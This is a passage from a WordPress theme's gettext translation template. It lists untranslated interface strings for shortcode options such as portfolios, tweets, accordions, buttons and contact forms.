university." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:66 msgid "Limit posts" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:69 msgid "Number of post to display" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:113 msgid "Filters" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:123 msgid "filter" msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/config.php:8 msgid "SLZ New Tweet" msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/config.php:9 msgid "Show twitter new tweet" msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/options/layout-2.php:17 msgid "Choose number of column on row." msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:15 #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:37 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:81 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-2.php:25 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:47 #: framework-customizations/extensions/widgets/widgets/button/options.php:11 msgid "Layouts" msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:20 #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:15 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:33 #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:40 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:51 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:30 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/vc_options.php:14 msgid "Choose layout to show" msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:43 msgid "Number Tweets" msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:46 msgid "The number of tweets to display." msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:50 msgid "Show Tweet's media" msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:53 msgid "Choose if you want to show Tweet's media or not." msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:57 msgid "Show Re-Tweet" msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:60 msgid "Choose if you want to show Re-Tweet." msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:64 msgid "Is Carousel?" msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:68 msgid "Choose if you want display tweets list as carousel." msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:72 msgid "Number Tweets per Slide" msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:79 msgid "The number of tweets per slide to display." msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:90 msgid "Account Name" msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:93 msgid "" "Enter the ID as it appears after the twitter url (ex. https://twitter.com/" "myID)." msgstr "" #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:94 msgid "Channel" msgstr "" #: framework-customizations/extensions/portfolio/config.php:39 msgid "Project Options" msgstr "" #: framework-customizations/extensions/portfolio/config.php:42 msgid "- Latest -" msgstr "" #: framework-customizations/extensions/portfolio/config.php:43 msgid "A to Z" msgstr "" #: framework-customizations/extensions/portfolio/config.php:44 msgid "Z to A" msgstr "" #: framework-customizations/extensions/portfolio/config.php:45 msgid "Post is selected" msgstr "" #: framework-customizations/extensions/portfolio/config.php:46 #: framework-customizations/theme/options/post-settings.php:240 msgid "Random" msgstr "" #: framework-customizations/extensions/portfolio/config.php:57 msgid "Portfolio base" msgstr "" #: framework-customizations/extensions/portfolio/config.php:58 msgid "Portfolio category base" msgstr "" #: framework-customizations/extensions/portfolio/config.php:61 msgid "Portfolio Category" msgstr "" #: framework-customizations/extensions/portfolio/config.php:62 msgid "Portfolio Categories" msgstr "" #: framework-customizations/extensions/portfolio/config.php:63 msgid "Portfolio Tag" msgstr "" #: framework-customizations/extensions/portfolio/config.php:64 msgid "Portfolio Tags" msgstr "" #: framework-customizations/extensions/portfolio/config.php:65 #: framework-customizations/extensions/portfolio/config.php:66 msgid "Portfolio Status" msgstr "" #: framework-customizations/extensions/portfolio/config.php:77 msgid "Images Gallery" msgstr "" #: framework-customizations/extensions/portfolio/config.php:78 msgid "" "Add images to gallery. Images should have minimum size: 800x600. Bigger size " "images will be cropped automatically." msgstr "" #: framework-customizations/extensions/portfolio/config.php:86 #: framework-customizations/extensions/portfolio/config.php:93 msgid "Attributes" msgstr "" #: framework-customizations/extensions/portfolio/config.php:94 msgid "Add attributes for this post." msgstr "" #: framework-customizations/extensions/portfolio/config.php:98 #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:60 #: framework-customizations/theme/options/general-settings.php:384 #: framework-customizations/theme/options/general-settings.php:447 msgid "Name" msgstr "" #: framework-customizations/extensions/portfolio/config.php:99 msgid "Enter attribute name." msgstr "" #: framework-customizations/extensions/portfolio/config.php:103 msgid "Value" msgstr "" #: framework-customizations/extensions/portfolio/config.php:104 msgid "Enter attribute value. Support HTML." msgstr "" #: framework-customizations/extensions/portfolio/config.php:116 msgid "Visible On Page" msgstr "" #: framework-customizations/extensions/portfolio/config.php:117 msgid "Check to show attributes on single page." msgstr "" #: framework-customizations/extensions/portfolio/config.php:118 msgid "Visible" msgstr "" #: framework-customizations/extensions/portfolio/config.php:132 msgid "Thumnail" msgstr "" #: framework-customizations/extensions/portfolio/config.php:133 msgid "Add thumbnail to the post." msgstr "" #: framework-customizations/extensions/portfolio/config.php:139 msgid "Short Description" msgstr "" #: framework-customizations/extensions/portfolio/config.php:140 msgid "Short description of post." msgstr "" #: framework-customizations/extensions/portfolio/config.php:146 msgid "Information" msgstr "" #: framework-customizations/extensions/portfolio/config.php:147 msgid "Information of post." msgstr "" #: framework-customizations/extensions/portfolio/config.php:156 msgid "Choose icon to post" msgstr "" #: framework-customizations/extensions/portfolio/hooks.php:32 msgid "- Choose Student -" msgstr "" #: framework-customizations/extensions/portfolio/hooks.php:48 msgid "Choose course for this project." msgstr "" #: framework-customizations/extensions/portfolio/hooks.php:54 msgid "Student" msgstr "" #: framework-customizations/extensions/portfolio/hooks.php:55 msgid "Choose student for this project." msgstr "" #: framework-customizations/extensions/portfolio/shortcodes/portfolio-carousel/config.php:9 msgid "SLZ Project Carousel" msgstr "" #: framework-customizations/extensions/portfolio/shortcodes/portfolio-carousel/config.php:10 msgid "Animated Carousel with projects" msgstr "" #: framework-customizations/extensions/portfolio/shortcodes/portfolio-carousel/config.php:47 #: framework-customizations/extensions/portfolio/shortcodes/portfolio-list/config.php:47 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:92 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/config.php:58 msgid "All" msgstr "" #: framework-customizations/extensions/portfolio/shortcodes/portfolio-list/config.php:9 msgid "SLZ Project List" msgstr "" #: framework-customizations/extensions/portfolio/shortcodes/portfolio-list/config.php:10 msgid "List of project" msgstr "" #: framework-customizations/extensions/portfolio/shortcodes/portfolio-list/options/layout-1.php:13 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:36 msgid "Choose style will be displayed." msgstr "" #: framework-customizations/extensions/portfolio/views/course-info.php:19 msgid "Portfolio for this course" msgstr "" #: framework-customizations/extensions/portfolio/views/course-info.php:24 msgid "Updated:" msgstr "" #: framework-customizations/extensions/portfolio/views/course-info.php:42 msgid "By Instructor:" msgid_plural "By Instructors:" msgstr[0] "" msgstr[1] "" #: framework-customizations/extensions/portfolio/views/course-info.php:46 msgid "Course Rating:" msgstr "" #: framework-customizations/extensions/portfolio/views/course-info.php:61 msgid "Learners:" msgstr "" #: framework-customizations/extensions/portfolio/views/course-info.php:61 #, php-format msgid "%d Student" msgid_plural "%d Students" msgstr[0] "" msgstr[1] "" #: framework-customizations/extensions/portfolio/views/meta-info.php:77 msgid "Portfolio By:" msgstr "" #: framework-customizations/extensions/portfolio/views/meta-info.php:80 #: includes/helpers.php:289 msgid "Categories:" msgstr "" #: framework-customizations/extensions/portfolio/views/meta-info.php:83 msgid "Last Updated:" msgstr "" #: framework-customizations/extensions/portfolio/views/meta-info.php:86 msgid "Skills:" msgstr "" #: framework-customizations/extensions/portfolio/views/meta-info.php:89 msgid "Languages:" msgstr "" #: framework-customizations/extensions/portfolio/views/related-item.php:9 msgid "Related Courses" msgstr "" #: framework-customizations/extensions/portfolio/widgets/project/views/admin.php:4 msgid "-All pages-" msgstr "" #: framework-customizations/extensions/portfolio/widgets/project/views/admin.php:33 msgid "Project Category ID" msgstr "" #: framework-customizations/extensions/portfolio/widgets/project/views/admin.php:35 msgid "Enter categories ID of project(Ex 1,2,3)" msgstr "" #: framework-customizations/extensions/portfolio/widgets/project/views/admin.php:39 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:18 msgid "Image Type" msgstr "" #: framework-customizations/extensions/portfolio/widgets/project/views/admin.php:48 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:106 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:101 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:111 msgid "Button Content" msgstr "" #: framework-customizations/extensions/portfolio/widgets/project/views/admin.php:52 msgid "Button Link (Custom)" msgstr "" #: framework-customizations/extensions/posts/posts/post-01/views/view.php:27 #: framework-customizations/extensions/posts/posts/post-02/views/view.php:25 #: framework-customizations/extensions/posts/posts/post-03/views/view.php:27 #: framework-customizations/extensions/posts/posts/post-04/views/view.php:25 #: framework-customizations/extensions/posts/posts/post-05/views/view.php:22 #, php-format msgid "Continue reading %s" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/config.php:12 msgid "SLZ About Me" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/config.php:13 msgid "Show about me block" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:22 #: framework-customizations/extensions/shortcodes/shortcodes/contact/options/layout-2.php:8 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:6 #: framework-customizations/extensions/shortcodes/shortcodes/video/options/layout-2.php:6 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:5 msgid "Pune" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:28 msgid "Social URL (Link)" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:30 msgid "Add link to social network." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:39 msgid "Choose style for layout India." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:49 msgid "Enter block title." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:62 msgid "Enter your name." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:66 msgid "Web Url" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:69 msgid "Enter your web site." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:76 msgid "Add custom button link." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:84 msgid "Position" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:86 msgid "Enter your position." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:90 msgid "Short Information" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:92 msgid "Enter your short information." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:96 msgid "Avatar" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:98 msgid "Upload your avatar (100x100px)." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:104 msgid "Introduce yourself." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:108 msgid "Social Profile" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:116 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:203 msgid "Add extra class to block." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/config.php:8 msgid "SLZ Accordion" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/config.php:9 msgid "Accordion of info list" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/options/layout-1.php:8 msgid "Georia" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/options/layout-1.php:20 msgid "Please choose style to show" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:13 msgid "Plus Icon" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:14 msgid "Arrow Icon" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:15 msgid "Custom Icon" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:19 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:18 msgid "Small Spacing" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:20 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:19 msgid "Large Spacing" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:21 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:33 msgid "No Spacing" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:43 msgid "Please choose layout to show" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:53 msgid "Style Icon" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:58 msgid "Please choose style icon to show" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:68 msgid "It is used for aligning the inner content of accordion item" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:72 msgid "Position of Dropdown Icon" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:76 msgid "Please choose postion of dropdown icon" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:95 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:33 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:82 msgid "Title. If it blank the block will not have a title" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:99 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:44 msgid "Content" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:102 msgid "Description. If it blank the block will not have a title" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:109 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:104 msgid "Enter button content." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:113 msgid "Link Button" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:116 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:111 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:64 msgid "Add custom link." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:125 msgid "Accordion Lists" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:144 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:86 msgid "Content Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:147 msgid "Choose a custom content text color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:152 msgid "Content Background Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:155 msgid "Choose a custom content background color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:160 msgid "Panel Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:163 msgid "Choose a custom panel background color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:168 msgid "Panel Active Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:171 msgid "Choose a custom panel active background color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:179 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:34 msgid "Choose a custom icon color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:184 msgid "Icon Color Active" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:187 msgid "Choose a custom icon color active." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:192 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:213 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:25 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:24 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:131 msgid "Icon Background Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:195 msgid "Choose a custom icon background color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:200 msgid "Icon Background Color Active" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:203 msgid "Choose a custom icon background color active." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/accordion/views/view.php:32 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/views/view.php:41 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/views/view.php:38 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/views/view.php:125 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/views/view.php:34 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/views/view.php:21 #: framework-customizations/extensions/teams/shortcodes/team-block/views/view.php:6 msgid "Please Active Visual Composer" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/config.php:10 msgid "SLZ Button" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:17 msgid "Large Size" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:18 msgid "Small Size" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:24 msgid " Button Alignment" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:28 msgid "Choose alignment of button." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:35 msgid "Button Layout" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:39 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:53 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:25 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:24 msgid "Choose layout to show." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:50 msgid "Enter text on button." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:54 msgid "Button size" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:57 msgid "Select size of button." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:65 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:122 msgid "Border Radius" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:68 msgid "Add rounded corners. Unit is px ( ex:50 )." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:76 msgid "Button Has Shadow?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:78 msgid "Add a shadow to button." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:83 msgid "Disable button?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:85 msgid "Make button disabled." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:97 msgid "Enter the desination URL." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:101 #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:126 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:119 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:287 msgid "Button Background Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:113 #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:135 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:126 msgid "Button Background Color Hover" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:116 msgid "Set the background color of button when mouse over." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:125 #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:144 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:105 msgid "Button Text Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:128 msgid "Set color of button text." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:137 #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:153 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:112 msgid "Button Text Color Hover" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:140 msgid "Set color of button text when mouse over." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:149 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:133 msgid "Button Border Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:152 msgid "Set color of button border." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:161 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:140 msgid "Button Border Color Hover" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:164 msgid "Set color of button border when mouse over." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:182 msgid "Icon Position" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:190 msgid "Select the display position of icon." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:194 msgid "Icon Box Shadow?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:200 msgid "Add a shadow to icon of button." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:207 msgid "Set color of icon." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:219 msgid "Set color of icon when mouse over." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:228 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:122 #: framework-customizations/theme/options/page-header-settings.php:61 #: framework-customizations/theme/options/page-options.php:107 msgid "Upload Image" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:234 msgid "Upload one image to make background for button." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:241 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:237 #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:73 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/vc_options.php:26 #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:104 msgid "Add extra class to button" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:248 msgid "Add New Button" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/config.php:10 msgid "SLZ Contact Form 7" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/config.php:11 msgid "Create an block contain contact form 7" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:5 msgid "-None-" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:18 msgid "Heading Text" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:21 msgid "Add heading text to contact form." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:25 msgid "Height Textarea" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:28 msgid "Add height textarea for contact form(Unit is px)" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:37 msgid "Choose Contact Form" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:40 msgid "Choose contact form to display." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:44 msgid "Box Shadow?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:46 msgid "Add a box-shadow to contact form" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:53 msgid "Add padding top for contact form(Unit is px)" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:61 msgid "Add padding bottom for contact form(Unit is px)" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:66 msgid "Padding Right" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:69 msgid "Add padding right for contact form(Unit is px)" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:74 msgid "Padding Left" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:77 msgid "Add padding left for contact form(Unit is px)" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:84 msgid "Upload an background image for contact form." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:90 msgid "Choose background color for contact form." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:94 msgid "Heading Icon Background Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:97 msgid "Choose a custom heading icon background color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:102 msgid "Heading Icon Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:105 msgid "Choose a custom heading icon color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:110 msgid "Heading Text Background Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:113 msgid "Choose a custom heading text background color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:118 msgid "Heading Text Color" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:121 msgid "Choose a custom heading text color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:129 msgid "Choose a custom background color." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:138 msgid "Choose a custom background color hover." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:147 msgid "Choose a custom color for button text." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:156 msgid "Choose a custom color hover for button text." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:165 msgid "Add extra class to image" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact/config.php:8 msgid "SLZ Contact" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact/config.php:9 msgid "Contact information" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact/options/layout-1.php:18 #: framework-customizations/extensions/shortcodes/shortcodes/contact/options/layout-2.php:18 msgid "Choose style for this shortcode." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact/options/layout-2.php:24 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:36 msgid "Title for this block." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:23 msgid "Display title" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:29 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:70 msgid "Enter number of column contact display on row." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:46 msgid "Content for this block." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:56 msgid "Add Contact Block" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:81 msgid "Select color for background." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:89 msgid "Select color for contact content." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:97 #: 